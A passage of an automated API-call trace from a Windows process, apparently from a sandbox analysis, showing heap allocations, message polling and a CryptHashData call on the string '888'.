returned 1 [0248.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0248.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0248.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0248.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0248.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0248.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0248.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0248.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0248.312] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0248.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0248.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0248.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0248.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0248.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0248.312] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0248.313] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0248.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0248.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0248.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0248.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0248.313] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0248.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ee8 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0248.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0248.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0248.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0248.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0248.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0248.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0248.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0248.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0248.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0248.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0248.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0248.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0248.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0248.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0248.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0248.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0248.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0248.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0248.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0248.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.314] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0248.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0248.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0248.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0248.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0248.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0248.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0248.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0248.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0248.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0248.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0248.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d48 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0248.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0248.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0248.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0248.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0248.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0248.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0248.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0248.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0248.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0248.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0248.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0248.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d98 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0248.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0248.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0248.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0248.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0248.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0248.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0248.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54df8 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.317] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0248.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0248.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0248.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0248.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0248.317] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0248.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0248.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0248.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0248.317] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0248.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0248.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0248.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0248.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0248.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0248.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0248.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0248.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0248.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0248.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0248.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0248.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0248.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0248.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.319] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0248.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51640, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0248.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0248.319] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0248.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0248.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0248.319] CryptHashData (hHash=0xa87250, pbData=0x2e54d48, dwDataLen=0x3, dwFlags=0x1) returned 1 